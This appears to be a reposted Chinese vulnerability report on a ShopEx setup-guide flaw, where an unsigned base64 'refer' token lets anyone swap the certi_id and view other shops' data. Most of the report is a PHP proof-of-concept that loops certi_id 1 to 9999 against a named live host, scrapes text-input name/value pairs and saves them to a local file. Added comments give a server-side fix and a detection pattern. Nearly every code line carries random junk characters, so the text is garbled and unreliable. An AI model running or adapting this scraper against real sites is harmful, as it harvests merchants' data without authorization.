|
简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在 shopex 网店使用向导页面
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=

refer 参数 base64 解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
我们修改 certi_id 即可遍历所有使用了 ShopEx 程序的网站
<?php1 E( K! h4 N" A% x- N
$ c1 l; i( O" j2 k% O
// Proof-of-concept driver from the report: tries certi_id 1..9999 in turn.
// What it demonstrates is a server-side defect: step2.php accepts a
// client-supplied certi_id inside a plain base64 "refer" parameter with no
// authorization binding. The remedy belongs on the server (tie certi_id to
// the authenticated session, or sign the refer token and verify it before
// rendering), not here. From a monitoring standpoint, a burst of step2.php
// requests with sequential certi_id values from one client is the signature
// of this enumeration.
for ($i=1; $i < 10000; $i++) { // enumerate
& h, V4 t8 `2 m0 Z
: |$ _5 E6 [. S ShowshopExD($i);1 N2 c0 [1 p8 E
4 i0 j4 O, \" g& E
}9 n" M/ a% P9 U b' _5 l
* \" n6 j# i3 @! O$ K$ q
// Requests step2.php with a forged refer token for one certi_id. If the
// response echoes the token back, every <input type="text"> name/value pair
// found in the page is printed and appended to c:/shopEx.txt.
// @param int|string $cid certi_id to try; coerced with intval() below.
function ShowshopExD($cid) {
3 O6 D }$ Z9 ^0 x1 q# f. D) D( |; A! o, x- }
$url='http://guide.ecos.shopex.cn/step2.php';
: W5 K2 Y% [0 q5 N
// The token is unsigned base64 JSON, so any certi_id can be substituted;
// callback_url is a dummy value.
! H/ g4 u Y' y* n $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}'); M7 P* C" E! d# d# L
9 c: r7 b. o7 E+ u( T
$url = $url.'?refer='.$refer;5 g8 d3 X2 u% E# s' P: F8 E x
' L. c2 G6 {/ k6 [" ]* C $ch = curl_init($url);3 h+ C/ t& ]- y2 M$ z/ I* U
5 ~( x) V4 O2 }# I
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;% h3 b6 E1 i4 `# D3 O
& q6 l7 x! z5 P6 }
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;5 U) {: s7 s1 w9 Q' I
, q. }' Y8 T+ `# m) l2 V" D' A% N
// NOTE(review): the return value is not checked; curl_exec() yields false on
// failure, which then flows into mb_convert_encoding() and strpos().
$result = curl_exec($ch);
B( v, Q2 O/ p& J: e% i& B/ A. n. M' ^" x; c# e& G
// Re-encodes the body to gb2312, presumably for a GBK console — TODO confirm.
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
% L, ~! H' u. w" q( y# R: u7 k
// NOTE(review): strpos() result used as a bool, so a match at offset 0 would
// be treated as "not found"; `!== false` would be the correct test.
7 C- s9 m( j% s( M: K; @( `' o! d if(strpos($result,$refer))
1 D0 V8 R% U, U8 o
' a+ t3 f, L+ o V1 g {
% D0 V7 [; J4 @# i
// Output file is opened in append mode and only closed inside this branch.
7 z& a( F; R3 M1 B: ], [3 R5 N; g $fp = fopen("c:/shopEx.txt",'ab'); // save to file
7 ]/ t/ V+ y9 D preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);% ~ x7 b, C% }$ `4 Y: g
! L8 w) B3 {5 b' y& I. B6 c" m foreach ($value[1] as $key) {
0 u( {, b% Z3 F6 V9 N3 |0 ?7 @! X8 [$ O4 a$ E/ X6 h7 ?9 ~
// NOTE(review): $res[1][0] / $res[3][0] are read without checking that the
// match succeeded; an <input> lacking name/value attributes would raise
// undefined-index notices.
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
* A& r; q, E1 U' U% j h. o, V% O, @8 o: J- d# A6 b
echo $res[1][0].':'.$res[3][0]."\r\n";
4 ^) y+ D4 |9 e8 W: ?* [! y9 V' {3 {: f1 `: w! u
$col =$res[1][0].':'.$res[3][0]."\r\n"; 4 `( u: s. y) H/ ]
- l) V5 ]8 Z# P4 J8 x/ w fwrite($fp, $col, strlen($col)); * T, N. x' J7 A8 |( c) J: [
/ s5 u3 F5 l& m' U* v }
* q* ]3 e1 [, k7 w
6 @2 n, j0 ` y& J9 w) d9 y A: c echo '--------------------------------'."\r\n";
4 [7 j, z0 T3 N1 F7 w
3 v9 J6 |3 m! K' w fclose($fp);
+ _9 ?" ^! |( z4 v
) [# A* } f# \ }
6 o+ h& C* h; x4 M* L) J _8 f" ~% k* @- M0 Y% c. d7 y
flush();/ S q& g# A8 K- D; I6 K8 q x
9 ^7 [6 w \& S! m* x# j' e2 L, I curl_close($ch);
0 R* n, V" `- ]2 i1 V
( z" ?* ~5 y* n3 r8 u: s! d }
& M! x8 A {7 b" t( c
5 d; B! J0 J+ Y! N; [+ Y( D?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer 换成其他加密方式
|
|